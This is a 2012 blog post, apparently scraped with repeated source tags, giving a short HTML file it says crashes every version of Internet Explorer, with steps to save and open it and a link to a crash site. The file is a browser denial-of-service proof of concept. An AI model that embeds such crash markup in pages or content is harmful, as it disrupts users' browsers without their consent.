Thursday, January 12, 2012

Easily Crash Any Version of Internet Explorer with Simple HTML




 Crash Internet Explorer with HTML
Simply open up notepad or another text editor, paste in the following, and save it as SomeFilename.html.

<html><head>
<style type="text/css">
#a {
        margin:0 10px 10px;
}

#b {
        width:100%;
}
</style>
<title>IE Crasher</title>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="test"/>
</div>
</td><td width="1"></td></tr></table>
</body></html> linktowhy.blogspot.com
It should end up looking something like this:  linktowhy.blogspot.com

Then open it up in Internet Explorer, and BOOM! IE is dead. linktowhy.blogspot.com
Note: hilariously, when I originally put this HTML code into the article, it actually crashed Windows Live Writer repeatedly. Finally had to login to WordPress and remove the code from there in order to be able to even open up the post again.

Where Does This Work? linktowhy.blogspot.com

We’ve tested this out, and it seems to crash just about every single version of IE, from IE6 even up to the latest Internet Explorer 9 platform preview that was released earlier today.

linktowhy.blogspot.com

It’s at this point that we should point out that we didn’t figure this out—in fact, there’s a web site that you can visit that will crash IE, and we got the source code from that site. linktowhy.blogspot.com
DO NOT CLICK THIS OR YOUR BROWSER WILL CRASH –> crashie8.com

No comments:

Post a Comment